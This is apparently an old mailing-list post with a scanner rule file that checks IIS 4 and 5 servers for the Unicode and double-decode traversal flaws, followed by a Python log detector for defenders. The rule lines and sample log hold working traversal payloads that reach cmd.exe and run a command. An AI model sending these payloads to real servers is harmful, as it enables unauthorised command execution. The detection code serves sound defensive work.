The attached UXE file, for use with TWWSCAN/TUXE Expert Scanner (available from: http://search.iland.co.kr) will scan IIS 4 and 5 servers for the old Unicode vulnerability and the new Filename Decode Error vulnerability.

Usage: tuxe target_server port iisuc.uxe

Cheers
d0gman

#############################################################################
#
# IIS 4 & 5 Unicode Checks
#
# Checks for old %C1%9C / %C1%1C / %C0%AF bug
# Checks for new %252f CGI encoding unicode bug.
#
# Rule by d0gman
#
# Usage: tuxe target port iisuc.uxe
#
#############################################################################
200 OK-> HEAD: /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\^Old Unicode Check 1;
200 OK-> HEAD: /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\^Old Unicode Check 2;
200 OK-> HEAD: /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\^Old Unicode Check 3;
200 OK-> HEAD: /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\^New Unicode check;
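
For defenders reviewing web server logs, the following added example (not part of the original post or of the TUXE rule file) flags request paths that use the encodings these rules probe for: a path separator hidden behind a 0xC0/0xC1 lead byte, or behind a second layer of percent-encoding. The log layout (client, method, target, status), the sample lines and the `lenient_fold` decoder model are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

TRAVERSAL = re.compile(rb"\.\.[/\\]")  # "../" or "..\" once decoded

def lenient_fold(raw: bytes) -> bytes:
    # Assumption: models a permissive decoder that accepts the never-valid
    # UTF-8 lead bytes 0xC0/0xC1 and keeps only the low 6 bits of the next byte.
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(raw[i])
            i += 1
    return bytes(out)

def classify(target: str) -> list:
    path = target.split("?", 1)[0]   # only the path is checked, not the query
    once = unquote_to_bytes(path)    # what a single URL-decode pass sees
    twice = unquote_to_bytes(once)   # what a redundant second pass would see
    if TRAVERSAL.search(once):
        return ["plain-traversal"]
    findings = []
    if TRAVERSAL.search(lenient_fold(once)):
        findings.append("overlong-utf8-separator")
    if TRAVERSAL.search(twice):
        findings.append("double-encoded-separator")
    return findings

def scan(log_lines):
    hits = []
    for n, line in enumerate(log_lines, 1):
        parts = line.split()
        if len(parts) < 4:
            continue
        found = classify(parts[2])
        if found:
            hits.append((n, parts[0], found))
    return hits

# Constructed sample log: client, method, target, status.
SAMPLE_LOG = [
    "192.0.2.10 GET /default.asp 200",
    "192.0.2.77 HEAD /scripts/..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\\ 404",
    "192.0.2.77 HEAD /scripts/..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\\ 404",
    "192.0.2.10 GET /docs/a%20b.htm?q=%252f 200",
]
```

A hit with status 404 means the probe was rejected; the same pattern with status 200 is the case that needs immediate follow-up.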